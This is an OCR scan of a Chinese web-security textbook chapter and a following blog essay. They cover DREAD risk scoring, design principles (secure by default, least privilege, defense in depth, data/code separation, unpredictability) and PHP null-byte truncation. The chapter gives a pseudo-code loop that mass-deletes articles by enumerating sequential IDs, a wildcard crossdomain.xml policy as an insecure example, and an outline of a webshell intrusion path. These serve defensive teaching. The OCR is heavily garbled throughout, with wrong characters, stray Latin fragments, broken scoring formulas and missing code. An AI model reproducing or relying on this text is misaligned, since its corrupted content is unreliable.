Exploitability “|” 初学 者 在 短期 内 能 学 握 攻击 方法 | 熟练 的 攻击 者 才能 完成 这 次 攻击 | AREA 
Affected users | AARP, MURE ARAP | 部 分 用 户 ， 非 跌 认 配置 极 少数 用 户 ， 匿 名 用 户 


在 私有 区 域 ， 部 分 人 能 看 到 需 | o o 
Discoverabiity | 。 漏 润 很 显眼 ， 攻 击 条件 很 容易 获得 | o BOA BIA 
PS aut ty 


在 DREAD 模 型 里 ， 每 一 个 因素 都 可 以 分 为 高 、 中 、 低 三 个 等 级 。 在 上 
表 中 ， 高 、 中 、 低 三 个 等 级 分 别 以 3、2、1 的 分 数 代表 其 权重 值 ， 因 
此 ， 我 们 可 以 具体 计算 出 某 一 个 威胁 的 风险 值 。 
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上 来 。 那 么 ， 这 丽 个 成 胁 对 这 的 风险 分 别 计算 如 下 ; 

走 正面 的 入 口 : 


Risk = D(3) + R(3) + E(3) + A(3) + D(3) = 
3+3+3+3+3=15 


走 后 LUNES 


isk - A R(1) + E(1) + A(3) + D(1) = 


+1+1+3+1= 


如 果 我 们 把 风险 高 低 定 义 如 下 : 

高 危 ，12 一 15 分 中 危 ，8 一 11 分 低 危 0 一 7 分 
那么 ， 正 面 入 口 是 最 高 危 的 ， 必 然 要 派 重兵 把 守 ;， 而 后 山 小 路 竟然 是 
中 危 的 ， 因 此 也 不 能 忽视 。 之 所 以 会 被 这 个 模型 判断 为 中 危 的 原因 ， 
a ee ee eee 
i A 

介绍 完 威胁 建 模 和 风险 分 析 的 模型 后 ， 我 们 对 安全 评估 的 整体 过 程 应 
该 有 了 一 个 大 致 的 了 解 。 在 任何 时 候 都 应 该 记 住 一 一 模型 是 死 的 ， 人 
是 活 的 ， 再 好 的 模型 也 是 需要 人 来 使 用 的 ， 在 确定 攻击 面 ， 以 及 判断 


Reproducibility | ”攻击 者 可 以 随意 再 次 攻击 


风险 高 低 时 ， 都 需要 有 一 定 的 经 验 ， 这 也 是 安全 工程 师 的 价值 所 在 。 
类 似 STRIDE 和 DREAD 的 模型 可 能 还 有 很 多 ， 不 同 的 标准 会 对 应 不 同 
的 模型 ， 只 要 我 们 觉得 这 些 模 型 是 科学 的 ， 能 够 帮 到 我 们 ， 就 可 以 使 
用 。 但 模型 只 能 起 到 一 个 辅助 的 作用 ， 最 终 做 出 决策 的 还 是 人 。 

164 设计 安全 方案 

安全 评估 的 产 出 物 ， 就 是 安全 解决 方案 。 解 决 方案 一 定 要 有 针对 性 ， 
人 


设计 解决 方案 不 难 ， 难 的 是 如 何 设 计 一 个 好 的 解决 方案 。 设 计 一 个 好 
的 解决 方案 ， 是 真正 考验 安全 工程 师 水 平 的 时 候 。 

很 多 人 认为 ， 安 全 和 业务 是 冲突 的 ， 因 为 往往 为 了 安全 ， 要 牺牲 业务 
的 一 些 易 用 性 或 者 性 能 ， 笔 者 不 太 移 同 这 种 观点 。 从 产品 的 角度 来 
说 ， 安 全 也 应 该 是 产品 的 一 种 属性 。 一 个 从 未 考虑 过 安全 的 产品 ， 至 
少 是 不 完整 的 。 

比如 ， 我 们 要 评价 一 个 杯子 是 否 好 用 ， 除 了 它 能 装 水 ， 能 装 多 少 水 
外 ， 还 要 思考 这 个 杯子 内 壁 的 材料 是 否 会 溶解 在 水 里 ， 是 否 会 有 毒 ， 
frm qM. TERR AM, uen EB 
使 用 杯子 的 安全 性 。 

对 于 互联 网 来 说 ， 安 全 是 要 为 产品 的 发 展 与 成 长 保 区 护航 的 。 我 们 不 
能 使 用 “粗暴 ”的 安全 方案 去 阻碍 产品 的 正常 发 展 ， 所 以 应 该 形成 这 样 
一 种 观点 :没有 不 安全 的 业务 ， 只 有 不 安全 的 实现 方式 。 产 品 需 求 ， 
尤其 是 商业 需求 ， 是 用 户 真 正 想 要 的 东西 ， 是 业务 的 意义 所 在 ， 在 设 
计 安 全 方案 时 应 该 尽 可 能 地 不 要 改变 商业 需求 的 初 囊 。 

作为 安全 工程 师 ， 要 想 的 就 是 如 何 通过 人 简单 而 有 效 的 方案 ， 解 决 遇 到 
的 安全 问题 。 安 全 方案 必须 能 够 有 歼 抵抗 威胁 ， 但 同时 不 能 过 多 干涉 
正常 的 业务 流程 ， 在 性 能 上 也 不 能 拖 后 腿 。 

好 的 安全 方案 对 用 己 应 该 是 透明 的 ， 尽 可 能 地 不 要 改变 用 户 的 使 用 习 
微软 在 推出 Windows Vista 时 ， 有 一 个 新 增 的 功能 叫 UAC， 每 当 系 统 

的 软件 有 什么 敏感 动作 时 ，UAC 就 会 弹出 来 询问 用 户 是 否 允 许 该 行 
为 。 这 个 功能 在 Vista 众 多 失败 的 原因 中 是 被 人 诉 病 最 多 的 一 个 。 如 果 
用 户 能 够 分 辩 什 么 样 的 行为 是 安全 的 ， 那 么 还 要 安全 软件 做 什么 ? 同 
样 的 问题 出 现在 很 多 主动 防御 的 桌面 安全 保护 软件 中 ， 它 们 动 辑 弹 出 
个 对 话 框 询 问 用 户 是 否 允 许 目 标的 行为 ， 这 是 非常 这 恋 的 用 户 体 验 。 


好 的 安全 产品 或 模块 除了 要 兼顾 用 户 体 验 外 ， 还 要 易于 持续 改进 。 一 
个 好 的 安全 模块 ， 同 时 也 应 该 是 一 个 优秀 的 程序 ， 从 设计 上 也 需要 做 
到 高 聚合 、 低 耦合 、 易 于 扩展 。 比 如 Nmap 的 用 户 承 可 以 自己 根据 需要 
写 插件 ， 实 现 一 些 更 为 复杂 的 功能 ， 满 足 个 性 化 需求 。 

最 终 ， 一 个 优秀 的 安全 方案 应 该 具备 以 下 特点 : 


能 够 有 效 解决 问题 ; 


。 用户 体 验 好 ; 

。 高 性 能 ; 

。 RRR; 

。 易于 扩展 与 升级 。 


关于 产品 安全 性 的 问题 ， 在 本 书 的 “互联 网 业务 安全 ”一 
深入 阐述 。 
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在 上 节 讲 述 了 实施 安全 评估 的 基本 过 程 ， 安 全 评估 最 后 的 产 出 物 就 是 
安全 方案 ， 但 在 具体 设计 安全 方案 时 有 什么 样 的 技巧 呢 ? 本 节 将 讲述 
在 实战 中 可 能 用 到 的 方法 。 

17.1 Secure By Default 原 则 

在 设计 安全 方案 时 ， 最 基本 也 最 重要 的 原则 就 是 “Secure by Default" ° 
在 做 任何 安全 设计 时 ， 都 要 牢 牢记 住 这 个 原则 。 一 个 方案 设计 得 是 否 
足够 安全 ， 与 有 没有 应 用 这 个 原则 有 很 大 的 关系 。 实 际 上 , “Secure by 
Default" 原 则 ， 也 可 以 归纳 为 白 名 单 、 黑 名单 的 思想 。 如 果 更 多 地 使 用 
白 名 单 ， 那 么 系统 就 会 变 得 更 安全 。 

1.711 黑 名 单 、 白 名 单 

比如 ， 在 制定 防火 墙 的 网 络 访问 控制 策略 时 ， 如 果 网 站 只 提供 Web 服 
务 ， 那 么 正确 的 做 法 是 只 允许 网 站 服务 器 的 80 和 443 端 口 对 外 提供 服 
务 ， 屏 菩 除 此 之 外 的 其 他 端口 。 这 是 一 种 “ 白 名 单 * 的 做 法 如果 使 
用 “ 黑 名 单 ”， 则 可 能 会 出 现 问题 。 假 设 黑 名 单 的 策略 是 : 不 允许 SSH 端 
口 对 Internet 开 放 ， 那 么 就 要 审计 SSH 的 默认 端口 : 22 端 口 是 否 开 放 了 
Internet。 但 在 实际 工作 过 程 中 ， 经 常会 发 现 有 的 工程 师 为 了 偷懒 或 图 
方便 ， 私 自 改 变 了 SSH 的 监听 端口 ， 比 如 把 SSH 的 端口 从 22 改 到 了 
2222， 从 而 绕 过 了 安全 策略 。 

又 比如 ， 在 网 站 的 生产 环境 服务 器 上 ， 应 该 限制 随意 安装 软件 ， 而 需 
要 制定 统一 的 软件 版 本 规范 。 这 个 规范 的 制定 ， 也 可 以 选择 白 名 单 的 
思想 来 实现 。 按 照 白 名 单 的 思想 ， 应 该 根据 业务 需求 ， 列 出 一 个 允许 
使 用 的 软件 以 及 软件 版 本 的 清单 ， 在 此 清单 外 的 软件 则 禁止 使 用 。 如 
果 人 允许 工程 师 在 服务 器 上 随意 安装 软件 的 话 ， 则 可 能 会 因为 安全 部 门 
不 知道 、 不 熟悉 这 些 软件 而 导致 一 些 漏 洞 ， 从 而 扩大 攻击 面 。 

在 Web 安 全 中 ， 对 白 名 单 思 想 的 运用 也 比比 丝 是 。 比 如 应 用 处 理 用 户 提 
交 的 富 文 本 时 ， 考 虚 到 XSS 的 问题 ， 需 要 做 安全 检查 。 常 见 的 XSS 
Filter 一 般 是 先 对 用 户 输入 的 HTML 原 文 作 HTMLParse， 解 析 成 标签 对 
象 后 ， 再 针对 标签 匹配 XSS 的 规则 。 这 个 规则 列表 就 是 一 个 黑白 名 单 。 
如 果 选 择 黑 名 单 的 思想 ， 则 这 套 规则 里 可 能 是 禁用 诸如 <script>、 
<iframe> 等 标签 。 但 是 黑 名 单 可 能 会 有 遗漏 ， 比 如 未 来 浏览 器 如 果 支 持 
新 的 HTML 标 签 ， 那 么 此 标签 可 能 就 不 在 黑 名 单 之 中 了 。 如 果 选 择 白 名 
单 的 思想 ， 就 能 避免 这 种 问题 一 一 在 规则 中 ， 只 人 允许 用 户 输入 诸如 
<a>、<img> 等 需要 用 到 的 标签 。 对 于 如 何 设计 一 个 好 的 XSS 防 御 方 
案 ， 在 “ 跨 站 脚本 攻击 ”一 章 中 还 会 详细 讲 到 ， 不 在 此 长 述 了 。 


然而 ， 并 不 是 用 了 白 名 单 就 一 定安 全 了 。 有 朋友 可 能 会 问 ， 作 者 刚才 
讲 到 选择 白 名 单 的 思想 会 更 安全 ， 现 在 又 说 不 一 定 ， 这 不 是 自 相 了 矛盾 
ng? 我 们 可 以 仔细 分 析 一 下 日 名 单 思 想 的 本 质 。 在 前 文中 提 到 : “安全 
问题 的 本 质 是 信任 问题 ， 安 全 方案 也 是 基于 信任 来 做 的 ”。 选 择 白 名 单 
的 思想 ， 基 于 白 名 单 来 设计 安全 方案 ， 其 实 就 是 信任 白 名 单 是 好 的 ， 
是 安全 的 。 但 是 一 旦 这 个 信任 基础 不 存在 了 ， 那 么 安全 就 荡然 无 存 。 
在 Flash 跨 域 访问 请 求 里 ， 是 通过 检查 目标 资源 服务 器 端的 
crossdomain.xml 文 件 来 验证 是 否 允 许 客 户 端的 Flash 跨 域 发 起 请 求 的 ， 
它 使 用 的 是 白 名 单 的 思想 。 比 如 下 面 这 个 策略 文件 : 


ss-domain-policy> 
w-access om domain 


rom 


指定 了 只 允许 特定 域 的 Flash 对 本 域 发 起 请 求 。 可 是 如 果 这 个 信任 列表 
中 的 域名 变 得 不 可 信 了 ， 那 么 问题 融会 随 之 而 来 比如; 


cross-domain-policy» 
«allow-access-from domain="*"/> 
/cross-domain-policy» 
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1.7.1.2 ”最 小 权限 原则 

Secure By Default 的 另 一 层 含义 束 是 “最 小 权限 原则 ”。 最 小 权限 原则 也 
是 安全 设计 的 基本 原则 之 一 。 最 小 权限 原则 要 求 系统 只 授予 主体 必要 
的 权限 ， 而 不 要 过 度 授 权 ， 这 样 能 有 效 地 减少 系统 、 网 络 、 应 用 、 数 
据 座 出 错 的 机 会 。 

比如 在 Linux 系 统 中 ， 一 种 良好 的 操作 习惯 是 使 用 普通 账户 登录 ， 在 执 
行 需 要 root 权 限 的 操作 上 时， 再 通过 sudo 命 令 完成 。 这 样 能 最 大 化 地 降低 
一 些 误 操 作 导 致 的 风险 ， 同 时 普通 账户 被 盗用 后 ， 与 root 帐 户 被 盗用 所 
导致 的 后 采 是 完全 不 同 的 。 

在 使 用 最 小 权限 原则 时 ， 需 要 认真 梳理 业务 所 需要 的 权限 ， 在 很 多 时 
候 ， 开 发 者 并 不 会 意识 到 业务 授予 用 户 的 权限 过 高 。 在 通过 访谈 了 解 
业务 时 ， 可 以 多 设置 一 些 反 问 句 ， 比 如 : 您 确定 您 的 程序 一 定 需 要 访 
问 IPnternet 吗 ? 通过 此 类 问题 ， 来 确定 业务 所 需 的 最 小 权限 。 

1.7.2 ”纵深 防御 原则 

与 Secure by Default 一 样 ，Defense inDepth (纵深 防御 ) 也 是 设计 安全 
方案 时 的 重要 指导 思想 。 


纵深 防御 包含 两 层 含义 : 首先 ， 要 在 各 个 不 同 层 面 、 不 同方 面 实施 安 
全 方案 ， 避 免 出 现 疏 漏 ， 不 同安 全 方案 之 间 需 要 相互 配合 ， 构 成 一 个 
上 整体， 其次， 要 在 正确 的 地 方 做 正确 的 事情 ， 即 ， 在 解决 根本 问题 的 
地 方 实施 针对 性 的 安全 方案 。 

某 矿 录 水 品牌 曾经 在 广告 中 展示 了 一 滴水 的 生产 过 程 : 经 过 十 多 层 的 
安全 过 滤 ， 云 除 有 害 物 质 ， 最 终 得 到 一 滴 饮 用 水 。 这 种 多 层 过 滤 的 体 
系 ， 职 是 一 种 纵深 防御 ， 是 有 立体 层次 感 的 安全 方案 。 

纵深 防御 并 不 是 同一 个 安全 方案 要 做 两 裔 或 多 沉 ， 而 是 要 从 不 同 的 层 
面 、 不 同 的 角度 对 系统 做 出 整体 的 解决 方案 。 我 们 常常 听 到 “ 木 桶 理 
论 ” 这 个 词 ， 说 的 是 一 个 桶 能 装 多 少 水 ， 不 是 取决 于 最 长 的 那 块 板 ， 而 
是 取决 于 最 短 的 那 块 板 ， 也 就 是 短 板 。 设 计 安 全 方案 时 最 怕 出 现 短 
板 ， 木 桶 的 一 块 块 板子 ， 就 是 各 种 具有 不 同 作 用 的 安全 方案 ， 这 些 板 
子 要 紧密 地 结合 在 一 起 ， 才 能 组 成 一 个 不 漏水 的 木 桶 。 

在 常见 的 入 侵 案 例 中 ， 大 多 数 是 利用 Web 应 用 的 漏洞 ， 攻 击 者 先 获 得 一 
个 低 权 限 的 webshell， 然 后 通过 低 权 限 的 webshell 上 传 更 多 的 文件 ， 并 
尝试 执行 更 高 权限 的 系统 命令 ， 尝 试 在 服务 器 上 提升 权限 为 root， 接 下 
来 攻击 者 再 进一步 尝试 渗透 内 网 ， 比 如 数据 库 服务 絮 所 在 的 网 段 。 

在 这 类 入 侵 案 例 中 ， 如 果 在 攻击 过 程 中 的 任何 一 个 环 太 设置 有 效 的 防 
御 措 施 ， 都 有 可 能 导致 入 侵 过 程 功 亏 一 筑 。 但 是 世上 没有 万 能 灵 药 ， 
也 没有 哪 种 解决 方案 能 解决 所 有 问题 ， 因 此 非常 有 必要 将 风险 分 散 到 
系统 的 各 个 层面 。 就 入 侵 的 防御 来 说 ， 我 们 需要 考虑 的 可 能 有 Web 应 用 
安全 、0S 系 统 安全 、 数 据 库 安 全 、 网 络 环境 安全 等 。 在 这 些 不 同 层面 
设计 的 安全 方案 ， 将 共同 组 成 整个 防御 体系 ， 这 也 束 古 纵深 防御 的 思 


纵深 防御 的 第 二 层 含义 ， 是 要 在 正确 的 地 方 做 正确 的 事情 。 如 何 理解 
We? 它 要 来 我 们 深入 理解 威胁 的 本 质 ， 从 而 做 出 正确 的 应 对 措施 。 

在 XSS 防 御 技 术 的 发 展 过 程 中 ， 兽 经 出 现 过 几 种 不 同 的 解决 思路 ， 直 到 
最 近 几 年 XSS 的 防御 思路 才 逐 渐 成 熟 和 统一 。 


XSS Defense 发 展 
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但 是 这 种 粗暴 的 做 法 常常 会 改变 用 户 原本 想 表达 的 意思 ， 比 如 : 
可 能 会 变 成 


造成 这 种 “马龙 ”的 结果 就 是 因为 没有 “在 正确 的 地 方 做 正确 的 事情 ?。 对 
于 XSS 防 御 ， 对 系统 取得 的 用 户 输入 进行 过 滤 其 实 是 不 太 合 适 的 ， 因 为 
XSS 真 正 产 生 危 害 的 场景 是 在 用 户 的 浏览 絮 上 ， 或 者 说 服务 絮 端 输出 的 
HTML 页 面 ， 被 注入 了 恶意 代码 。 只 有 在 拼装 HTML 时 和 输出， 系统 才能 
获得 HTML 上 下 文 的 语义 ， 才 能 判断 出 是 否 存在 误杀 等 情况 。 所 以 “在 
正确 的 地 方 做 正确 的 事情 ?”， 也 是 纵深 防御 的 一 种 含义 必须 把 防御 
方案 放 到 最 合适 的 地 方 去 解决 。 (XSS 防 御 的 更 多 细节 请 参考 “ 跨 站 脚 
本 攻击 ”一 章 。) 

近 几 年 安全 厂商 为 了 迎合 市 场 的 需要 ， 推 出 了 一 种 产品 叫 UTM， 全 称 
是 “统一 威胁 管理 ”(Uni-fied Threat Management) 。UTM 几 乎 集成 了 所 


有 主流 安全 产品 的 功能 ， 比 如 防火 墙 、VPN、 反 垃圾 邮件 、IDS、 反 病 
毒 等 。UTM 的 定位 是 当中 小 企业 没有 精力 自己 做 安全 方案 时 ， 可 以 在 
一 定 程度 上 提高 安全 门槛 。 但 是 UTM 并 不 是 万 能 药 ， 很 多 问题 并 不 应 
该 在 网 络 层 、 网 关 处 解决 ， 所 以 实际 使 用 时 歼 采 未 必 好 ， 它 更 多 的 是 
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另 一 个 重要 的 安全 原则 是 数据 与 代码 分 离 原 则 。 这 一 原则 广泛 适用 于 
各 种 由 于 “注入 ”而 引发 安全 问题 的 场景 。 

实际 上 ， 缓 神 区 洲 出 ， 也 可 以 认为 是 程序 违背 了 这 一 原则 的 后 果 一 一 
程序 在 栈 或 者 堆 中 ， 将 用 户 数据 当做 代码 执行 ， 混 清 了 代码 与 数据 的 
边界 ， 从 而 导致 安全 问题 的 发 生 。 

fg Web EHH, AEA’ S| Bm Egi. WU Xxss-^ SQL 
Injection ^ CRLF Injection ^ X-Path Injection 等 。 此 类 问题 均 可 以 根 
据 “ 数 据 与 代码 分 离 原则 ?设计 出 真正 安全 的 解决 方案 ， 因 为 这 个 原则 
抓 住 了 漏洞 形成 的 本 质 原因 。 

以 XSS 为 例 ， 它 产生 的 原因 是 HTML Injection 或 JavaScript Injection， 如 
果 一 个 页 面 的 代码 如 下 : 


«html» 
<head>test</head> 
<body> 


$var 
</body> 
</html> 


其 中 $var 息 用户 能 够 控制 的 变量 ， 那 么 对 于 这 段 代 码 来 说 : 


就 是 程序 的 代码 执行 段 。 
而 


就 是 程序 的 用 户 数据 片段 。 
T STU 尸 数据 片段 $var 当 成 代码 片段 来 解释 、 执 行 ， 束 会 引发 安全 问 
题 。 


比如 ， 当 $var 的 值 是 : 
上 时， 用 户 数 据 就 被 注入 到 代码 片段 中 。 解 析 这 上 段 脚本 并 执行 的 过 程 ， 
是 由 浏览 絮 来 完成 的 一 一 浏 贤 絮 将 用 户 数 据 里 的 <script> 标 签 当 做 代码 


来 解释 一 一 这 显然 不 是 程序 开发 者 的 本 意 。 

根据 数据 与 代码 分 离 原则 ， 在 这 里 应 该 对 用 户 数据 片段 $var 进 行 安全 处 
理 ， 可 以 使 用 过 滤 、 编码 等 手段 ， 把 可 能 造成 代码 视 清 的 用 户 数据 清 
理 挥 ， 具 体 到 这 个 案例 中 ， 束 是 针对 <、> 等 符号 做 处 理 。 

有 的 朋友 可 能 会 问 了 : 我 这 里 束 古 要 执行 一 个 <script> 标 签 ， 要 弹出 一 
段 文 字 ， 比 如 : “ORE! ”， 那 怎么 办 呢 ” 

在 这 种 情况 下 ， 数 据 与 代码 的 情况 束 发 生 了 变化 ， 根 据 数据 与 代码 分 
离 原 则 ， 我 们 束 应 该 重 写 代码 片段 : 


在 这 种 情况 下 ，<script> 标 签 也 变 成 了 代码 片段 的 一 部 分 ， 用 户 数据 只 
有 $varl 能 够 控制 ， 从 而 杜绝 了 安全 问题 的 发 生 。 

1.7.4 不 可 预测 性 原则 

前 面 介绍 的 几 条 原则 : Secure By Default， 有 是 时 刻 要 牢记 的 总 则 ;纵深 
防御 ， 是 要 更 全 面 、 更 正确 地 看 竺 问题 ; 数据 与 代码 分 离 ， 是 从 漏洞 
成 因 上 看 问题 ， 接 下 来 要 讲 的 “不 可 预测 性 ?原则 ， 则 是 从 克服 攻击 方 
法 的 角度 看 问题 。 

微软 的 Windows 系 统 用 户 多 年 来 深 受 缓冲 区 淤 出 之 吾 ， 因 此 微软 在 
Windows 的 新 版 本 中 增加 了 许多 对 抗 缓冲 区 淤 出 等 内 存 攻击 的 功能 。 微 
软 无 法 要求 运行 在 系统 中 的 软件 没有 漏洞 ， 因 此 它 采 取 的 做 法 是 让 漏 
洞 的 攻击 方法 失效 。 比 如 ， 使 用 DEP 来 保证 堆栈 不 可 执行 ， 使 用 ASLR 
让 进程 的 栈 基 址 随机 变化 ， 从 而 使 攻击 程序 无 法 准确 地 猜测 到 内 存 地 
址 ， 大 大 提高 了 攻击 的 门槛 。 经 过 实践 检验 ， 证 明 微 软 的 这 个 思路 确 
实 是 有 效 的 即使 无 法 修复 code， 但 是 如 果 能 够 使 得 攻击 的 方法 无 
效 ， 那 么 也 可 以 算是 成 功 的 防御 。 

微软 使 用 的 ASLR 技 术 ， 在 较 新 版 本 的 Linux 内 核 中 也 文 持 。 在 ASLR 的 
控制 下 ， 一 个 程序 每 次 启动 时 ， 其 进程 的 栈 基 址 都 不 相同 ， 具 有 一 定 
的 随机 性 ， 对 于 攻击 者 来 说， 这 丈 是 “不 可 预测 性 ”。 

不 可 预测 性 (Unpredictable) ， 能 有 效 地 对 抗 基 于 算 改 、 伪 造 的 攻击 。 
我 们 看 看 如 下 场景 : 

假设 一 个 内 容 管 理 系统 中 的 文章 序号 ， 是 按照 数字 升序 排列 的 ， 比 如 
id=1000, id=1002,id=1003...... 


样 的 顺序 ， 使 得 攻击 者 能 够 很 方便 地 裔 历 出 系统 中 的 所 有 文章 编 
找到 一 个 整数 ， 依 次 递增 即 可 。 如 于 攻击 者 想 要 批量 删除 这 些 文 
写 个 简单 的 脚本 : 


for (i-0;i«100000;i-*)[( 
Delete(url+"?id="+i); 


iX 
与 : 
章 ， 
束 可 以 很 方便 地 达到 目的 。 但 是 如 果 该 内 容 管理 系统 使 用 了 “不 可 预测 
性 ”原则 ， 将 id 的 值 变 得 不 可 预测 ， 会 产生 什么 结果 呢 ? 


id-asldfjaefsadlf, id-adsfalkennffxc, id-poer-jfweknfd.... 


id Eee KTM, Baa Ce, R ORTER 
2118 的 页 面 id 全 部 抓 取 下 来 ， 再 一 一 进行 分 机 ， 从 而 提高 了 攻击 的 门 
不 可 预测 性 原则 ， 可 以 巧妙 地 用 在 一 些 敏感 数据 上 。 比 如 在 CSRF 的 防 
御 技 术 中 ， 通 单 会 使 用 一 个 token 来 进行 有 效 防御 。 这 个 token 能 成 功 防 
御 CSRF， 就 是 因为 攻击 者 在 实施 CSRF 攻 击 的 过 程 中 ， 是 无 法 提前 预 
知 这 个 token 值 的 ， 因 此 要 来 token 足 够 复 灯 时 ， 不 能 被 攻击 者 猜测 到 。 
(具体 细节 请 参考 “ 跨 站 点 请 求 伪 造 ” 一 章 。) 

不 可 预测 性 的 实现 往往 需要 用 到 加 密 算法 、 随 机 数 算法 、 哈 硕 算 法 ， 
好 好 使 用 这 条 原则 ， 在 设计 安全 方案 时 往往 会 事半功倍 。 


1.8 小结 

本 章 归 纳 了 笔者 对 于 安全 世界 的 认识 和 思考 ， 从 互联 网 安全 的 发 展 史 
说 起 ， 揭 示 了 安全 问题 的 本 质 ， 以 及 应 该 如 何 展开 安全 工作 ， 最 后 总 
结 了 设计 安全 方案 的 几 种 思路 和 原则 。 在 后 续 的 章 和 中 ， 将 继续 揭示 
Web 安 全 的 方方面面 ， 并 深入 理解 攻击 原理 和 正确 的 解决 之 道 我 
们 会 面 对 各 种 各 样 的 攻击 ， 解 决 方案 为 什么 要 这 样 设计 ， 为 什么 这 最 
合适 ? 这 一 切 的 出 发 点 ， 都 可 以 在 本 章 中 找到 本 质 的 原因 。 

安全 是 一 中] 朴素 国学 | 加， 也 是 一 种 平 稀 时 过 术 < EEEE, A 
是 互联 网 安全 ， 其 内 在 的 原理 都 是 一 样 的 。 我 们 只 需 抓 住 安全 问题 的 
本 质 ， 之 后 无 论 遇 到 任何 安全 问题 (不 仅仅 局 限于 Web 安 全 或 互联 网 
安全 ) ， 都 会 无 往 而 不 利 ， 因 为 我 们 已 经 真正 地 懂得 了 如 何 用 安全 的 
眼光 来 看 得 这 个 世界 ! 


(Bt) 谁 来 为 漏洞 买单 ? 
上 昨天 介绍 了 PHP 中 is_a0 函 数 功能 改变 引发 的 问题 ， 后 来 发 现 很 多 朋友 
不 认同 这 是 一 个 漏洞 ， 原 因 是 通过 民 好 的 代码 习惯 能 够 避免 该 问题 ， 
比如 写 一 个 安全 的 _autoload0 函 数 。 
我 觉得 我 有 必要 讲 讲 一 些 安全 方面 的 哲学 问题 ， 但 这 些 想法 只 代表 我 
个 人 的 观点 ， 是 我 的 安全 世界 观 。 
互联 网 本 来 是 安全 的 ， 目 从 有 了 研究 安全 的 人 ， 束 变 得 不 安全 了 。 
所 有 的 程序 本 来 也 没有 漏洞 ， 只 有 功能 ， 但 当 一 些 功能 被 用 于 破坏 ， 
造成 损失 上 时， 也 就 成 了 漏洞 。 
我 们 定义 一 个 功能 是 否 是 漏洞 ， 只 看 后 果 ， 而 不 应 该 看 过 程 。 
计算 机 用 0 和 1 定义 了 整个 世界 ， 但 在 整个 世界 中 ， 并 非 所 有 事情 都 能 
简单 地 用 “是 ”或 者 “ 非 ? 来 判断 ， 漏 洞 也 是 如 此 ， 因 为 破坏 有 程度 轻重 
之 分 ， 当 破坏 程度 超过 菜 一 临界 值 时 ， 多 数 人 (注意 不 是 所 有 人 ) 会 
接受 这 是 一 个 漏洞 的 事实 。 但 事物 是 变化 的 ， 这 个 临界 值 也 不 是 一 成 
不 变 的 , “多 数 人 ”也 不 是 一 成 不 变 的 ， 所 以 我 们 要 用 变化 的 观点 去 看 
竺 变化 的 事物 。 
泄露 用 户 个 人 信息 ， 比 如 电话 、 住 址 ， 在 以 前 几乎 称 不 上 漏洞 ， 因 为 
没有 人 利用 ;但 在 互联 网 越 来 越 关 心 用 户 隐 私 的 今天 ， 这 束 变 成 了 一 
个 严重 的 问题 ， 因 为 有 无 数 的 坏人 时 刻 在 想 着 利用 这 些 信息 搞 破坏 ， 
非法 抽取 利益 。 所 以 ,今天 如 果 发 现 某 网 站 能 够 批量 、 未 经 授权 获取 
到 用 户 个 人 信息 ， 这 了 就 是 一 个 漏洞 。 
再 举 个 例子 。 有 用户 登 录 的 memberID 是 否 属于 机 密 信 息 ? 在 以 往 做 信息 
安全 ， 我 们 都 只 知道 “密码 *、“ 安 全 问题 * 等 传统 意义 上 的 机 密 信息 需 
要 保护 。 但 是 在 今天 ， 在 网 站 的 业务 设计 中 ， 我 们 发 现 loginID 也 应 该 
属于 需要 保护 的 信息 。 因 为 loginID 一 旦 泄露 后 ， 可 能 会 导致 被 又 力 倒 
f, 甚至 有 的 用 户 将 loginID 当 成 密码 的 一 部 分 ， 会 被 墨客 猜 中 用 户 的 
密码 或 者 是 黑客 通过 攻击 一 些 第 三 方 站 点 (比如 SNS) 后 ， 找 到 同样 
的 loginID 来 党 试 登录 。 
正 因 为 攻击 技术 在 发 展 ， 所 以 我 们 对 漏洞 的 定义 也 在 不 断 变 化 。 可 能 
很 多 朋友 都 没有 注意 到 ， 一 个 业务 安全 设计 得 好 的 网 站 ， 往 往 loginID 
和 nick-name (昵称 ) 是 分 开 的 。 登 录 ID 是 用 户 的 私有 信息 ， 只 有 用 户 
本 人 能 够 看 到 ; 而 nickname 不 能 用 于 登录 ， 但 可 以 公开 给 所 有 人 看 。 
这 种 设计 的 细 季 ， 是 网 站 积极 防御 的 一 种 表现 。 


可 能 很 多 朋友 仍然 不 愿意 承认 这 些 问 题 是 漏洞 ， 那 么 什么 是 漏洞 呢 ? 
在 我 看 来 ， 漏 洞 只 是 对 破坏 性 功能 的 一 个 统称 而 已 。 

但 是 “漏洞 ”这 顶 帆 子 太 大 ， 大 到 我 们 难以 承受 ， 所 以 我 们 不 妨 换 一 个 
角度 看 ， 看 看 是 否 “ 应 该 修补 ”。 语 言 真 是 很 神奇 的 东西 ， 很 多 时 候 换 
一 个 称呼 ， 束 能 让 人 的 认可 度 提高 很 多 。 

在 PHP 的 5.3.4 和 版 本 中 ， 人 和 修补 了 很 多 年 来 万 恶 的 0 字 节 截断 功能 ， 这 个 功 
能 被 文件 包含 漏洞 利用 ， 醒 造 了 无 数 “血案 ”。 

我 们 知道 PHP 中 include/require 一 个 文件 的 功能 ， 如 果 有 民 好 的 代码 规 
范 ， 则 是 安全 的 ， 不 会 成 为 漏洞 。 

这 是 一 个 正常 的 PHP 语 言 的 功能 ， 只 是 “ 某 一 群 不 明 真相 的 小 白 程序 
员 ” 在 一 个 错误 的 时 间 、 错 误 的 地 点 写 出 了 错误 的 代码 ， 使 得 “ 某 一 小 
振 狭 独 的 黑客 ?发现 了 这 些 错误 的 代码 ， 从 而 导致 漏洞 。 这 是 操作 系统 
的 问题 ， 谁 叫 操作 系统 在 壳 历 文件 路 径 时 会 被 0 字 节 截断， 谁 叫 C 语 言 
的 string 操 作 是 以 0 字 节 为 结束 符 ， 谁 叫 程序 员 写 出 这 么 小 白 的 代码 ， 
官方 文档 里 已 经 提醒 过 了 ， 关 PHP 什 么 事情 ， 太 和 揭 枉 了 ! 

我 也 觉得 PHP 挺 冤枉 的 ， 但 C 语 言 和 操作 系统 也 挺 冤 的 ， 我 们 就 是 这 人 么 
规定 的 ， 如 之 奈何 ? 

但 总 得 有 人 来 为 错误 买单 ， 谁 买单 呢 ? 写 出 不 安全 代码 的 小 白 程序 
Dit 

No! 学 习 过 市 场 营销 方面 知识 的 同学 应 该 知道 ， 永 远 也 别 指望 让 最 终 
用 户 来 买单 ， 就 像 老 百姓 不 应 该 为 政府 的 错误 买单 一 样 (当然 在 某 个 
神奇 的 国度 除外 ) 。 所 以 必须 得 有 人 为 这 些 不 是 漏洞 ， 但 造成 了 既成 
事实 的 错误 负责 ， 我 们 需要 有 社会 责任 感 的 owner。 

很 高 兴 的 是 ，PHP 官 方 在 经 历 这 么 多 年 纠结 、 折 县 、 发 疾 之 后 ， 终 于 
